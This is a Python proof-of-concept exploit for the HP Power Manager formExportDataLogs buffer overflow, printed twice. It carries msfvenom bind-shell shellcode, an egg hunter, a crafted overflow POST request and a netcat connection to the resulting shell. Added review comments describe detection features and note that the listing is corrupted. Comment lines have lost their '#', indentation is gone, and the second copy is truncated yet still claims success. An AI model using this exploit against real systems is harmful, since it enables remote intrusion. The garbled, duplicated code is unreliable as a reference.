#!/usr/bin/python
# Proof-of-concept for the HP Power Manager 'formExportDataLogs' overflow
# described in the banner below (the banner names the Metasploit module
# that covers the same bug).
# NOTE(review): this copy of the listing is corrupted: several comment lines
# have lost their leading '#' and the bodies of try/if blocks have lost
# their indentation, so it is not valid Python as printed. Treat it as a
# reference for the request shape, not as a tool.
# Defensive takeaway: the request built further down (a POST to
# /goform/formExportDataLogs carrying an oversized fileName form field and
# binary data in the Accept header) is what detection should key on;
# mitigation is patching the product and keeping its web interface off
# untrusted networks. The banner's "TODO: adjust" was never resolved.
print ("""
##//#############################################################################################################
##
Vulnerability: HP Power Manager 'formExportDataLogs' ## FormExportDataLogs Buffer Overflow
## HP Power Manager
Vulnerable Application: HP Power Manager ## This is a part of the Metasploit Module,
Tested on Windows [Version 6.1.7600] ## exploit/windows/http/hp_power_manager_filename
##
Author: Muhammad Haidari ## Spawns a shell to same window
##
##//#############################################################################################################
TODO: adjust
Usage: python hpm_exploit.py
""")
import urllib
import os
import sys
import struct
import time
from socket import *
# Target host is taken from argv[1]; a missing argument prints usage and
# exits. NOTE(review): the bodies of this try/except have lost their
# indentation in this copy.
try:
HOST = sys.argv[1]
except IndexError:
print ("Usage: %s HOST" % sys.argv[0])
sys.exit()
# Plain-HTTP port the request below is sent to.
PORT = 80
# Bind-shell payload produced by the msfvenom command in the comment below;
# the bytes are kept verbatim. It is prefixed with an egg tag so the egg
# hunter defined further down can find it once it is placed in the Accept
# header. For defenders: an Accept header made of non-printable bytes is
# anomalous on its own and easy to flag at a proxy or IDS.
# NOTE(review): the "Note: Updated badchars ..." and "Add egg tag ..." lines
# are comments that lost their leading '#' in this copy.
#msfvenom -p windows/shell_bind_tcp LHOST=192.168.45.209 LPORT=4444 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c' -f python
Note: Updated badchars to include the ones from your original
buf = b""
buf += b"\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x82\x8e\x95\xe3\x83\xee\xfc\xe2\xf4"
buf += b"\x7e\x66\x17\xe3\x82\x8e\xf5\x6a\x67\xbf\x55\x87"
buf += b"\x09\xde\xa5\x68\xd0\x82\x1e\xb1\x96\x05\xe7\xcb"
buf += b"\x8d\x39\xdf\xc5\xb3\x71\x39\xdf\xe3\xf2\x97\xcf"
buf += b"\xa2\x4f\x5a\xee\x83\x49\x77\x11\xd0\xd9\x1e\xb1"
buf += b"\x92\x05\xdf\xdf\x09\xc2\x84\x9b\x61\xc6\x94\x32"
buf += b"\xd3\x05\xcc\xc3\x83\x5d\x1e\xaa\x9a\x6d\xaf\xaa"
buf += b"\x09\xba\x1e\xe2\x54\xbf\x6a\x4f\x43\x41\x98\xe2"
buf += b"\x45\xb6\x75\x96\x74\x8d\xe8\x1b\xb9\xf3\xb1\x96"
buf += b"\x66\xd6\x1e\xbb\xa6\x8f\x46\x85\x09\x82\xde\x68"
buf += b"\xda\x92\x94\x30\x09\x8a\x1e\xe2\x52\x07\xd1\xc7"
buf += b"\xa6\xd5\xce\x82\xdb\xd4\xc4\x1c\x62\xd1\xca\xb9"
buf += b"\x09\x9c\x7e\x6e\xdf\xe6\xa6\xd1\x82\x8e\xfd\x94"
buf += b"\xf1\xbc\xca\xb7\xea\xc2\xe2\xc5\x85\x71\x40\x5b"
buf += b"\x12\x8f\x95\xe3\xab\x4a\xc1\xb3\xea\xa7\x15\x88"
buf += b"\x82\x71\x40\x89\x8a\xd7\xc5\x01\x7f\xce\xc5\xa3"
buf += b"\xd2\xe6\x7f\xec\x5d\x6e\x6a\x36\x15\xe6\x97\xe3"
buf += b"\x93\xd2\x1c\x05\xe8\x9e\xc3\xb4\xea\x4c\x4e\xd4"
buf += b"\xe5\x71\x40\xb4\xea\x39\x7c\xdb\x7d\x71\x40\xb4"
buf += b"\xea\xfa\x79\xd8\x63\x71\x40\xb4\x15\xe6\xe0\x8d"
buf += b"\xcf\xef\x6a\x36\xea\xed\xf8\x87\x82\x07\x76\xb4"
buf += b"\xd5\xd9\xa4\x15\xe8\x9c\xcc\xb5\x60\x73\xf3\x24"
buf += b"\xc6\xaa\xa9\xe2\x83\x03\xd1\xc7\x92\x48\x95\xa7"
buf += b"\xd6\xde\xc3\xb5\xd4\xc8\xc3\xad\xd4\xd8\xc6\xb5"
buf += b"\xea\xf7\x59\xdc\x04\x71\x40\x6a\x62\xc0\xc3\xa5"
buf += b"\x7d\xbe\xfd\xeb\x05\x93\xf5\x1c\x57\x35\x75\xfe"
buf += b"\xa8\x84\xfd\x45\x17\x33\x08\x1c\x57\xb2\x93\x9f"
buf += b"\x88\x0e\x6e\x03\xf7\x8b\x2e\xa4\x91\xfc\xfa\x89"
buf += b"\x82\xdd\x6a\x36"
Add egg tag before shellcode (b33fb33f) - convert egg_tag to bytes
# The tag is bytes so it can be concatenated with buf.
egg_tag = b"b33fb33f" # Make this bytes by adding b prefix
shellcode = egg_tag + buf # Now both are bytes
# Egg-hunter stub (from the egghunter.rb command below) and the overflow
# buffer that lands in the fileName form field. Note that hunter is a str
# while buf above is bytes; ret_addr is decoded to str so that the buffer
# is assembled entirely as text.
# NOTE(review): "Calculate buffer size ...", "Return address ...", "Build the
# buffer ..." and "721 bytes ..." are comments that lost their '#' in this
# copy.
#tools/exploit/egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\$%\x1a' -e b33f -v 'hunter'
hunter = ""
hunter += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
hunter += "\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7"
hunter += "\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
Calculate buffer size - need to reach return address
Return address from original: 0x4174d5 (pop esi # pop ebx # ret 10 from DevManBE.exe)
ret_addr = struct.pack("<L", 0x004174d5) # Properly packed for little-endian
Build the buffer - keep everything as strings
721 bytes total to return address
# Padding is sized so that padding + 30 NOPs + hunter totals 721 bytes.
buffer = "\x41" * (721 - len(hunter) - 30) # Adjust for hunter and NOPs
buffer += "\x90" * 30 # NOP sled
buffer += hunter # Egg hunter (string)
buffer += "\x90" * 4 # Small NOP sled before return
buffer += ret_addr.decode('latin-1') # Convert bytes to string for concatenation
# Form body and raw HTTP request. The overflow buffer travels percent-encoded
# in the fileName field; the tagged shellcode travels in the Accept header.
# For detection: an abnormally long fileName value on this endpoint and a
# non-ASCII Accept header are the two features request inspection can match.
# NOTE(review): "Use urllib.parse ...", "Check if ..." and "shellcode is
# bytes ..." are comments that lost their '#'; the if/else bodies have lost
# their indentation in this copy.
Use urllib.parse.quote_plus for Python 3
Check if we're using Python 2 or 3 for urllib
if sys.version_info[0] == 3:
import urllib.parse
content = "dataFormat=comma&exportto=file&fileName=%s" % urllib.parse.quote_plus(buffer)
else:
content = "dataFormat=comma&exportto=file&fileName=%s" % urllib.quote_plus(buffer)
content += "&bMonth=03&bDay=12&bYear=2017&eMonth=03&eDay=12&eYear=2017&LogType=Application&actionType=1%253B"
shellcode is bytes, need to decode to string for HTTP header
shellcode_str = shellcode.decode('latin-1')
# Request is built by hand rather than with an HTTP client so the header
# bytes are sent exactly as assembled.
payload = "POST /goform/formExportDataLogs HTTP/1.1\r\n"
payload += "Host: %s\r\n" % HOST
payload += "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
payload += "Accept: %s\r\n" % shellcode_str # Shellcode with egg tag in Accept header
payload += "Referer: http://%s/Contents/exportLogs.asp?logType=Application\r\n" % HOST
payload += "Content-Type: application/x-www-form-urlencoded\r\n"
payload += "Content-Length: %s\r\n\r\n" % len(content)
payload += content
# Send the request over a raw socket, wait, then hand off to netcat for the
# bind shell on port 4444 (the LPORT in the msfvenom comment above).
# NOTE(review): os.system() interpolates HOST straight from argv into a
# shell string, so a HOST value containing shell metacharacters is executed
# locally; subprocess.run with an argument list would avoid that. The
# try/except bodies have also lost their indentation in this copy.
try:
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print("[+] Payload Fired... Waiting for shell...")
# Encode the entire payload to bytes for sending
if sys.version_info[0] == 3:
s.send(payload.encode('latin-1'))
else:
s.send(payload)
s.close()
print("[+] Give it 30 seconds...")
time.sleep(30)
print("[+] Attempting to connect to bindshell on port 4444...")
os.system("nc -nv " + HOST + " 4444")
except Exception as e:
print("[-] Error: %s" % str(e))
sys.exit(1)
print("[+] Exploit completed. Check if you got your shell!")
#!/usr/bin/python
# NOTE(review): from here on the page repeats the script above a second
# time (this copy additionally carries contact lines in the banner) and is
# truncated at the end, so the socket block never sends the request. The
# same corruption applies: comment lines without '#' and lost indentation.
print ("""
##//#############################################################################################################
##
Vulnerability: HP Power Manager 'formExportDataLogs' ## FormExportDataLogs Buffer Overflow
## HP Power Manager
Vulnerable Application: HP Power Manager ## This is a part of the Metasploit Module,
Tested on Windows [Version 6.1.7600] ## exploit/windows/http/hp_power_manager_filename
##
Author: Muhammad Haidari ## Spawns a shell to same window
Contact: ghmh@outlook.com ##
Website: www.github.com/muhammd ##
##
##//#############################################################################################################
TODO: adjust
Usage: python hpm_exploit.py
""")
import urllib
import os
import sys
import struct
import time
from socket import *
# Target host from argv[1]; usage and exit when it is missing.
# NOTE(review): try/except bodies have lost their indentation in this copy.
try:
HOST = sys.argv[1]
except IndexError:
print ("Usage: %s HOST" % sys.argv[0])
sys.exit()
# Plain-HTTP port the request below is sent to.
PORT = 80
# Same msfvenom bind-shell payload as in the first copy of the script,
# kept verbatim and prefixed with the egg tag.
# NOTE(review): the "Note: ..." and "Add egg tag ..." lines are comments that
# lost their leading '#'.
#msfvenom -p windows/shell_bind_tcp LHOST=192.168.45.209 LPORT=4444 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c' -f python
Note: Updated badchars to include the ones from your original
buf = b""
buf += b"\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x82\x8e\x95\xe3\x83\xee\xfc\xe2\xf4"
buf += b"\x7e\x66\x17\xe3\x82\x8e\xf5\x6a\x67\xbf\x55\x87"
buf += b"\x09\xde\xa5\x68\xd0\x82\x1e\xb1\x96\x05\xe7\xcb"
buf += b"\x8d\x39\xdf\xc5\xb3\x71\x39\xdf\xe3\xf2\x97\xcf"
buf += b"\xa2\x4f\x5a\xee\x83\x49\x77\x11\xd0\xd9\x1e\xb1"
buf += b"\x92\x05\xdf\xdf\x09\xc2\x84\x9b\x61\xc6\x94\x32"
buf += b"\xd3\x05\xcc\xc3\x83\x5d\x1e\xaa\x9a\x6d\xaf\xaa"
buf += b"\x09\xba\x1e\xe2\x54\xbf\x6a\x4f\x43\x41\x98\xe2"
buf += b"\x45\xb6\x75\x96\x74\x8d\xe8\x1b\xb9\xf3\xb1\x96"
buf += b"\x66\xd6\x1e\xbb\xa6\x8f\x46\x85\x09\x82\xde\x68"
buf += b"\xda\x92\x94\x30\x09\x8a\x1e\xe2\x52\x07\xd1\xc7"
buf += b"\xa6\xd5\xce\x82\xdb\xd4\xc4\x1c\x62\xd1\xca\xb9"
buf += b"\x09\x9c\x7e\x6e\xdf\xe6\xa6\xd1\x82\x8e\xfd\x94"
buf += b"\xf1\xbc\xca\xb7\xea\xc2\xe2\xc5\x85\x71\x40\x5b"
buf += b"\x12\x8f\x95\xe3\xab\x4a\xc1\xb3\xea\xa7\x15\x88"
buf += b"\x82\x71\x40\x89\x8a\xd7\xc5\x01\x7f\xce\xc5\xa3"
buf += b"\xd2\xe6\x7f\xec\x5d\x6e\x6a\x36\x15\xe6\x97\xe3"
buf += b"\x93\xd2\x1c\x05\xe8\x9e\xc3\xb4\xea\x4c\x4e\xd4"
buf += b"\xe5\x71\x40\xb4\xea\x39\x7c\xdb\x7d\x71\x40\xb4"
buf += b"\xea\xfa\x79\xd8\x63\x71\x40\xb4\x15\xe6\xe0\x8d"
buf += b"\xcf\xef\x6a\x36\xea\xed\xf8\x87\x82\x07\x76\xb4"
buf += b"\xd5\xd9\xa4\x15\xe8\x9c\xcc\xb5\x60\x73\xf3\x24"
buf += b"\xc6\xaa\xa9\xe2\x83\x03\xd1\xc7\x92\x48\x95\xa7"
buf += b"\xd6\xde\xc3\xb5\xd4\xc8\xc3\xad\xd4\xd8\xc6\xb5"
buf += b"\xea\xf7\x59\xdc\x04\x71\x40\x6a\x62\xc0\xc3\xa5"
buf += b"\x7d\xbe\xfd\xeb\x05\x93\xf5\x1c\x57\x35\x75\xfe"
buf += b"\xa8\x84\xfd\x45\x17\x33\x08\x1c\x57\xb2\x93\x9f"
buf += b"\x88\x0e\x6e\x03\xf7\x8b\x2e\xa4\x91\xfc\xfa\x89"
buf += b"\x82\xdd\x6a\x36"
Add egg tag before shellcode (b33fb33f) - convert egg_tag to bytes
egg_tag = b"b33fb33f" # Make this bytes by adding b prefix
shellcode = egg_tag + buf # Now both are bytes
# Egg-hunter stub and overflow buffer, identical to the first copy above:
# hunter and the padding are str, ret_addr is decoded to str to match.
# NOTE(review): the four prose lines between hunter and buffer are comments
# that lost their '#'.
#tools/exploit/egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\$%\x1a' -e b33f -v 'hunter'
hunter = ""
hunter += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
hunter += "\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7"
hunter += "\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
Calculate buffer size - need to reach return address
Return address from original: 0x4174d5 (pop esi # pop ebx # ret 10 from DevManBE.exe)
ret_addr = struct.pack("<L", 0x004174d5) # Properly packed for little-endian
Build the buffer - keep everything as strings
721 bytes total to return address
buffer = "\x41" * (721 - len(hunter) - 30) # Adjust for hunter and NOPs
buffer += "\x90" * 30 # NOP sled
buffer += hunter # Egg hunter (string)
buffer += "\x90" * 4 # Small NOP sled before return
buffer += ret_addr.decode('latin-1') # Convert bytes to string for concatenation
# Form body and hand-built HTTP request, identical to the first copy: the
# buffer goes percent-encoded into fileName, the tagged shellcode into the
# Accept header. Those two features (oversized fileName on this endpoint,
# non-ASCII Accept header) are what request inspection should match.
# NOTE(review): three comment lines here lost their '#' and the if/else
# bodies lost their indentation.
Use urllib.parse.quote_plus for Python 3
Check if we're using Python 2 or 3 for urllib
if sys.version_info[0] == 3:
import urllib.parse
content = "dataFormat=comma&exportto=file&fileName=%s" % urllib.parse.quote_plus(buffer)
else:
content = "dataFormat=comma&exportto=file&fileName=%s" % urllib.quote_plus(buffer)
content += "&bMonth=03&bDay=12&bYear=2017&eMonth=03&eDay=12&eYear=2017&LogType=Application&actionType=1%253B"
shellcode is bytes, need to decode to string for HTTP header
shellcode_str = shellcode.decode('latin-1')
payload = "POST /goform/formExportDataLogs HTTP/1.1\r\n"
payload += "Host: %s\r\n" % HOST
payload += "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
payload += "Accept: %s\r\n" % shellcode_str # Shellcode with egg tag in Accept header
payload += "Referer: http://%s/Contents/exportLogs.asp?logType=Application\r\n" % HOST
payload += "Content-Type: application/x-www-form-urlencoded\r\n"
payload += "Content-Length: %s\r\n\r\n" % len(content)
payload += content
# NOTE(review): this second copy is truncated. The try block only opens the
# socket, connects and prints; the send(), close(), sleep and netcat hand-off
# present in the first copy are missing, so the closing "Exploit completed"
# message is misleading here. try/except bodies have lost their indentation.
try:
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print("[+] Payload Fired... Waiting for shell...")
except Exception as e:
print("[-] Error: %s" % str(e))
sys.exit(1)
print("[+] Exploit completed. Check if you got your shell!")